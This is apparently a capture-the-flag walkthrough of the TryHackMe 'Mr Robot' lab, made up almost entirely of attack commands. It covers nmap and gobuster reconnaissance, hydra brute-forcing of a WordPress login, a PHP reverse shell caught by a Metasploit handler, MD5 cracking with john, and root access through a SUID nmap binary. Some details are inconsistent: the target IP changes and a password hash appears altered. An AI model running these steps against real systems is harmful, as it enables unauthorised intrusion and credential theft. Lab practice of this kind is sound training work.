Amazing TryHackMe Mr Robot CTF Writeup

TryHackMe Mr Robot CTF

TryHackMe Mr Robot CTF is based on the Mr. Robot show, can you root this box?

TryHackMe Mr Robot CTF

TryHackMe Mr Robot CTF Recon the B0x

nmap -Pn -sC -sV --script=vuln 10.10.171.61

Mr Robot CTF

./gobuster dir -u http://10.10.171.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -q
wget http://10.10.171.61/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
wget http://10.10.171.61/key-1-of-3.txt
wget http://10.10.171.61/fsocity.dic

Brute Force WordPress Login

Detect Valid Username

hydra -L /home/kali/Desktop/TryHackMe_Labs/MrRobot_Lab/fsocity.dic -p rfs 10.10.131.16 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Something is incorrect." -V -F -u

Detect Valid Password

hydra -l Elliot -P /home/kali/Desktop/TryHackMe_Labs/MrRobot_Lab/fsocity.dic 10.10.131.16 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Something is incorrect." -V -F -u

Upload PHP reverse Shell

http://10.10.171.61/wp-login.php
metasploit listeningport 19850
msfconsole
use exploit/multi/handler
set LHOST tun0
set LPORT 19850
run
$ pwd
/home/robot
$ ls
key-2-of-3.txt
password.raw-md5
cat password.raw-md5

robot:c3fcd3d76192e4007dfb496cca-RFS
echo "c3fcd3d76192e4007dfb496cca-RFS" >> robot_passwd_md5.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt robot_passwd_md5.txt
python -c 'import pty; pty; pty.spawn("/bin/bash")'
daemon@linux:/home/robot$ su - robot

Insert MD5 password cracked before

$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
cat /home/robot/key-2-of-3.txt

Privilege Escalation

cat /etc/crontab
sudo -l

Find SUID Binaries

find / -perm +6000 2>/dev/null | grep '/bin/'
/usr/local/bin/nmap --interactive
!sh
cat /root/key-3-of-3.txt

Mr Robot CTF

How to Attack WordPress Website